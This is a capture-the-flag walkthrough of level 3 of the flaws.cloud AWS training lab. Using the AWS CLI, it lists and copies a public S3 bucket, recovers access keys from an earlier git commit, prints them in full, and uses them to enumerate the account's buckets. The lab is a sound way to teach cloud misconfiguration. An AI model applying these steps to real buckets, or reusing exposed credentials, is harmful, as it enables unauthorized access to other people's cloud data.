Level 3 – Challenge statement:
The next level is fairly similar, with a slight twist. Time to find your first AWS key! I bet you’ll find something that will let you list what other buckets are.
Background
flaws.cloud itself says it best:
Through a series of levels you'll learn about common mistakes and gotchas when using Amazon Web Services (AWS).
There are no SQL injection, XSS, buffer overflows, or many of the other vulnerabilities you might have seen before. As much as possible, these are AWS specific issues.
A series of hints are provided that will teach you how to discover the info you'll need.
If you don't want to actually run any commands, you can just keep following the hints which will give you the solution to the next level.
At the start of each level you'll learn how to avoid the problem the previous level exhibited.
Scope: Everything is run out of a single AWS account, and all challenges are sub-domains of flaws.cloud.
My approach:
Similar suggests S3 again, perhaps one with AWS access and secret keys in it.
We know that the bucket name to start from is level3-9afd3927f195e10225021a578e6f78df.flaws.cloud
Let’s first try public access, by browsing too: http://s3-us-west-2.amazonaws.com/level3-9afd3927f195e10225021a578e6f78df.flaws.cloud
Works!, seems to be a bunch of files in there.
Lets get a cleaner list by using the AWS CLI:
~$ aws s3 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud --recursive
2017-09-17 23:12:24 52 .git/COMMIT_EDITMSG
2017-09-17 23:12:24 23 .git/HEAD
2017-09-17 23:12:24 130 .git/config
2017-09-17 23:12:24 73 .git/description
2017-09-17 23:12:24 452 .git/hooks/applypatch-msg.sample
2017-09-17 23:12:24 896 .git/hooks/commit-msg.sample
2017-09-17 23:12:24 189 .git/hooks/post-update.sample
2017-09-17 23:12:24 398 .git/hooks/pre-applypatch.sample
2017-09-17 23:12:24 1704 .git/hooks/pre-commit.sample
2017-09-17 23:12:24 4898 .git/hooks/pre-rebase.sample
2017-09-17 23:12:24 1239 .git/hooks/prepare-commit-msg.sample
2017-09-17 23:12:24 3611 .git/hooks/update.sample
2017-09-17 23:12:24 600 .git/index
2017-09-17 23:12:24 240 .git/info/exclude
2017-09-17 23:12:24 359 .git/logs/HEAD
2017-09-17 23:12:24 359 .git/logs/refs/heads/master
2017-09-17 23:12:24 679 .git/objects/0e/aa50ae75709eb4d25f07195dc74c7f3dca3e25
2017-09-17 23:12:24 770 .git/objects/2f/c08f72c2135bb3af7af5803abb77b3e240b6df
2017-09-17 23:12:25 820 .git/objects/53/23d77d2d914c89b220be9291439e3da9dada3c
2017-09-17 23:12:25 245 .git/objects/61/a5ff2913c522d4cf4397f2500201ce5a8e097b
2017-09-17 23:12:25 112013 .git/objects/76/e4934c9de40e36f09b4e5538236551529f723c
2017-09-17 23:12:25 560 .git/objects/92/d5a82ef553aae51d7a2f86ea0a5b1617fafa0c
2017-09-17 23:12:25 191 .git/objects/b6/4c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
2017-09-17 23:12:25 42 .git/objects/c2/aab7e03933a858d1765090928dca4013fe2526
2017-09-17 23:12:25 904 .git/objects/db/932236a95ebf8c8a7226432cf1880e4b4017f2
2017-09-17 23:12:25 98 .git/objects/e3/ae6dd991f0352cc307f82389d354c65f1874a2
2017-09-17 23:12:25 279 .git/objects/f2/a144957997f15729d4491f251c3615d508b16a
2017-09-17 23:12:25 125 .git/objects/f5/2ec03b227ea6094b04e43f475fb0126edb5a61
2017-09-17 23:12:25 41 .git/refs/heads/master
2017-02-27 08:14:33 123637 authenticated_users.png
2017-02-27 08:14:34 1552 hint1.html
2017-02-27 08:14:34 1426 hint2.html
2017-02-27 08:14:35 1247 hint3.html
2017-02-27 08:14:33 1035 hint4.html
2017-02-27 10:05:16 1703 index.html
2017-02-27 08:14:33 26 robots.txt
2 interesting bits here, namely authenticated_users.png and the .git directory contents.
Lets browse to have a look at the PNG first: http://s3-us-west-2.amazonaws.com/level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/authenticated_users.png
Ok thats nothing useful, just an image for the level 3 documentation…
Now lets poke around the .git directory…
Lets make a local copy first:
$ aws s3 cp s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud ~/testtest --recursive
.git/COMMIT_EDITMSG
contains the message: “Oops, accidentally added something I shouldn’t have” – which likely means that they did a commit inclusive of AWS keys…
Furthermore if I run git log
I get:
commit b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
Author: 0xdabbad00 <scott@summitroute.com>
Date: Sun Sep 17 09:10:43 2017 -0600
Oops, accidentally added something I shouldn't have
commit f52ec03b227ea6094b04e43f475fb0126edb5a61
Author: 0xdabbad00 <scott@summitroute.com>
Date: Sun Sep 17 09:10:07 2017 -0600
first commit
This implies there is something in commit f52ec03b227ea6094b04e43f475fb0126edb5a61
that the developer didn’t want there, and removed it in commit b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
Lets have a closer look at commit f52ec03b227ea6094b04e43f475fb0126edb5a61
git checkout f52ec03b227ea6094b04e43f475fb0126edb5a61
Then lets look at what file(s) have popped out:
~/testtest$ ls
access_keys.txt authenticated_users.png hint1.html hint2.html hint3.html hint4.html index.html robots.txt
Oops, there is access_keys.txt
, lets look
~/testtest$ cat access_keys.txt
access_key AKIAJ366LIPB4IJKT7SA
secret_access_key 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
Lets make another AWS configure profile using the newly discovered keys:
~/testtest$ aws configure --profile flawslevel3
AWS Access Key ID [None]: AKIAJ366LIPB4IJKT7SA
AWS Secret Access Key [None]: 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
Default region name [None]: us-west-2
Default output format [None]:
Now let’s see if they are valid, and if any interesting S3 buckets are available:
$ aws s3 ls --profile flawslevel3
2017-02-19 03:41:52 2f4e53154c0a7fd086a04a12a452c2a4caed8da0.flaws.cloud
2017-05-30 00:34:53 config-bucket-975426262029
2017-02-27 04:06:33 flaws-logs
2017-02-19 03:40:54 flaws.cloud
2017-02-24 13:15:42 level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
2017-02-27 02:29:03 level3-9afd3927f195e10225021a578e6f78df.flaws.cloud
2017-02-27 02:49:31 level4-1156739cfb264ced6de514971a4bef68.flaws.cloud
2017-02-27 03:49:03 level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud
2017-02-27 03:48:40 level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud
2017-02-27 04:07:13 theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud
Indeed!, there are the bucket names for level 2 to the end.
Lets try browse to Level 4 publicly: http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud/
Level 4 unlocked.